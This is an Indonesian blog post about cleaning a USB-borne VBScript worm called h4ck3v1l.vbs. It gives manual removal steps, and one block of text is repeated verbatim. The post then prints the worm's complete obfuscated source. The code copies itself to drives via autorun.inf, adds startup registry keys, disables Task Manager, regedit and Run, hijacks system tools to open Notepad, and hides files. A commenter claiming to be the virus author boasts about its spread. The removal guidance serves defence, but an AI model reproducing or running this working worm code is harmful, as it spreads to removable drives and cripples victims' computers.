Akhir bulan Desember ini saya disibukkan dengan datangnya tamu yang ga' diundang ke kompi saya. Sebenarnya memang udah tau sih kalau kompi saya bakal kedatangan tamu yang ga' diundang itu, soalnya ga' ada cara lain lagi buat ngumpulin tugas adek-adek yang lagi belajar buat website statik, dan kebetulan kemaren itu waktunya mepet kali untuk ngumpulin tugas, jadi terpaksa anunya(flashdisk) di colokin kekomputer saya. Awalnya sih memang di scan terlebih dahulu ama antivirus luar yang ter-update, tapi ga' ada satupun yang kedeteksi ama antivirusnya. Pusing, pusing, pusing, sakit hati iya juga, gara-gara tamunya ngerjain yang ga' seharusnya di kerjain. Gimana ga' sakit hati, menu yang di hilangin antara lain adalah :
1. Run (yang keluar malah notepad dgn bahasa amburadul)
2. Search (fasilitas pencarian file/folder)
3. Command Promt (yang keluar adalah tulisan amburadul juga di aplikasi notepad)
4. Task Manager(Ctrl+Alt+Del) (yang keluar masih tulisan amburadul)
5. Regedit (sama dengan yang diatas, errornya)
6. Menu Options pada windows explorer di hilangin juga,
7. Parahnya lagi, pake acara hidden file dan ga' bisa nginstal aplikasi apapun.
Tapi ga' pha2x... sekarang saya udah tau gimana caranya ngilangin virus ini. Rupanya virus ini lebih asyik dihilangin dengan cara manual dibandingkan dengan menggunakan antivirus. Gimana ya... caranya ? he.. he.. he.. sabar dikit mas...
Sebelumnya kamu harus punya peralatan perangnya dulu (buat yang trouble-nya mirip dengan diatas). Kamu bisa download peralatan perangnya di blognya PC Guru atau dapat juga download pada link dibawah ini :
1. Regalyzer (pengganti Registry Editor)
2. Freecommander (pengganti Windows Explorer buat lihat file yang di hidden)
Jangan lupa Antivirus yang handal buat men-scan jika telah selesai dibunuh virusnya. Atau pengen download aplikasi lain sebagai pendukung jika dianggap perlu untuk proses eksekusi virusnya.
Kira-kira step-step yang harus kita lakukan adalah sbb:
1. Non aktifkan(disable) dulu System Restore
2. Restart komputernya
3. Masuk ke safe mode
4. Buka Regalyzer, cari file yg berhubungan dg h4ck3v1l.vbs(gunakan fasilitas Find)
5. Hapus/modifikasi values yang berhubungan dengan h4ck3v1l.vbs pada Regedit
6. Restart lagi komputernya
7. Buka freecommander cari dan hapus setiap file yg berhubungan dgn h4ck3v1l.vbs
8. Hapus semua file temp IE
9. Matikan proses/service/startup h4ck3v1l.vbs (jika masih ditemukan di Msconfig)
10. Terakhir scan dengan menggunakan antivirus buat siaga akhir.
11. Enjoy...
Berikut saya tampilkan source code h4ck3v1l.vbs
1. Run (yang keluar malah notepad dgn bahasa amburadul)
2. Search (fasilitas pencarian file/folder)
3. Command Promt (yang keluar adalah tulisan amburadul juga di aplikasi notepad)
4. Task Manager(Ctrl+Alt+Del) (yang keluar masih tulisan amburadul)
5. Regedit (sama dengan yang diatas, errornya)
6. Menu Options pada windows explorer di hilangin juga,
7. Parahnya lagi, pake acara hidden file dan ga' bisa nginstal aplikasi apapun.
Tapi ga' pha2x... sekarang saya udah tau gimana caranya ngilangin virus ini. Rupanya virus ini lebih asyik dihilangin dengan cara manual dibandingkan dengan menggunakan antivirus. Gimana ya... caranya ? he.. he.. he.. sabar dikit mas...
Sebelumnya kamu harus punya peralatan perangnya dulu (buat yang trouble-nya mirip dengan diatas). Kamu bisa download peralatan perangnya di blognya PC Guru atau dapat juga download pada link dibawah ini :
1. Regalyzer (pengganti Registry Editor)
2. Freecommander (pengganti Windows Explorer buat lihat file yang di hidden)
Jangan lupa Antivirus yang handal buat men-scan jika telah selesai dibunuh virusnya. Atau pengen download aplikasi lain sebagai pendukung jika dianggap perlu untuk proses eksekusi virusnya.
Kira-kira step-step yang harus kita lakukan adalah sbb:
1. Non aktifkan(disable) dulu System Restore
2. Restart komputernya
3. Masuk ke safe mode
4. Buka Regalyzer, cari file yg berhubungan dg h4ck3v1l.vbs(gunakan fasilitas Find)
5. Hapus/modifikasi values yang berhubungan dengan h4ck3v1l.vbs pada Regedit
6. Restart lagi komputernya
7. Buka freecommander cari dan hapus setiap file yg berhubungan dgn h4ck3v1l.vbs
8. Hapus semua file temp IE
9. Matikan proses/service/startup h4ck3v1l.vbs (jika masih ditemukan di Msconfig)
10. Terakhir scan dengan menggunakan antivirus buat siaga akhir.
11. Enjoy...
Berikut saya tampilkan source code h4ck3v1l.vbs
'h4ck3v1l.vbs on error resume next dim mysource,winpath,HGjYuiyJWX,fs,mf,atr,tf,rg,nt,check,sd atr = fNIOEKUfRA("^ovspuvb\")&vbcrlf&fNIOEKUfRA("tcw/m2w4ld5i!fyf/uqjsdtx>fuvdfyfmmfit") set fs = createobject(fNIOEKUfRA("udfkcPnfutzTfmjG/hojuqjsdT")) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]")) tf.attributes = 32 set tf=fs.createtextfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]"),2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & fNIOEKUfRA("tcw/m2w4ld5i]")) tf.attributes = 39 for each HGjYuiyJWX in fs.drives If (HGjYuiyJWX.drivetype = 1 or HGjYuiyJWX.drivetype = 2) and HGjYuiyJWX.path <> fNIOEKUfRA(";B") then set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]")) tf.attributes =32 set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]"),2,true) tf.write mysource tf.close set tf=fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("tcw/m2w4ld5i]")) tf.attributes =39 set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]")) tf.attributes = 32 set tf=fs.createtextfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]"),2,true) tf.write atr tf.close set tf =fs.getfile(HGjYuiyJWX.path &fNIOEKUfRA("goj/ovspuvb]")) tf.attributes=39 end if next set rg = createobject(fNIOEKUfRA("mmfiT/uqjsdTX")) rg.regwrite fNIOEKUfRA("]eobnnpd]mmbutoJ]mmfit]fmjggoj]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm") rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjghfs]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm") rg.regwrite fNIOEKUfRA("]eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("fyf/ggphpm") rg.regwrite fNIOEKUfRA("]eobnnpd]ofqp]mmfit]fmjg4qn]UPPS`TFTTBMD`ZFLI"), fNIOEKUfRA("tcw/m2w4ld5i") rg.regwrite fNIOEKUfRA("sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("zbmqtjEtnfuJzbsUpO") rg.regwrite fNIOEKUfRA("ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("fyf/qnbojX]qnbojX]tfmjG!nbshpsQ];D"), fNIOEKUfRA("HOJSUT`HFS") rg.regwrite fNIOEKUfRA("topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA(fNIOEKUfRA("2")), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), fNIOEKUfRA("2"), fNIOEKUfRA("ESPXE`HFS") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("fyf/ebqfupO") rg.regwrite fNIOEKUfRA("m2w4ld5i]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),winpath&fNIOEKUfRA("tcw/m2w4ld5i]") rg.regwrite fNIOEKUfRA("fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("mu/fhbq/777mfsvB/xxx00;quui") rg.regwrite fNIOEKUfRA("fmujU!xpeojX]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"),fNIOEKUfRA("777!MFSVB!ZC!EFLDBI") rg.regwrite fNIOEKUfRA("sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("777!mfsvB"),fNIOEKUfRA("HOJSUT`HFS") rg.regwrite fNIOEKUfRA("opjub{jobhsPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI"),fNIOEKUfRA("4d2m1Q!juoB"),fNIOEKUfRA("HOJSUT`HFS") if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject(fNIOEKUfRA("mmfit/uqjsdtX")) sd.run winpath&fNIOEKUfRA("!$udfmft0$f0!fyf/sfspmqyf]")&Wscript.ScriptFullname Function fNIOEKUfRA(eaYRjLasVU) Dim i, tmp2 For i = 1 To Len(eaYRjLasVU) tmp2 = Chr(Asc(Mid(eaYRjLasVU, i, 1)) - 1) + tmp2 Next fNIOEKUfRA = tmp2 End FunctionUntuk informasi pendukung lainnya, silahkan tanya dengan paman google atau gabung dengan teman-teman dimillis yang membahas masalah virus. Thnks... selamat mencoba !
paling aman pake linux ae....hehheehhe...ya namane window..biasa langganan virus
Iya nich... rencananya udah lama mo hijrah habis2an ke linux. Cuma yang laennya lagi familiar sm windaow. Linux baru dipake untuk pembelajaran dan keserver doank...
wiiiih manteb juga nih ilmunya. Thanx aja dech. Salam kenal
Sory bro, kalo virus gw dah bikin lo pusing...wkwkwkwkwkwkwkw
padahal cuman buat iseng aja, taunya dah sampe ke pekanbaru juga, naik mobil atau naek apan yah kesana ??
WKWKWKWKWK
salam dari Minang GRey HAt
Aurel 666 aka H4ck3v1l
Indak tau juo da. Mungkin virusnyo ikuik travel pai ko pekanbaru. Tapi indak ba'a do, alah dape' ilmunyo untuak ngilangin virus uda... Thnk's komentarnyo. (berserakan bhs minangnya, padahal saya bukan orang minang lho. Kalo ga' ngerti bhs minangnya, silahkan translate di google translate (kalau ada) bagi yang mo belajar bahasa minang. He...he...2x)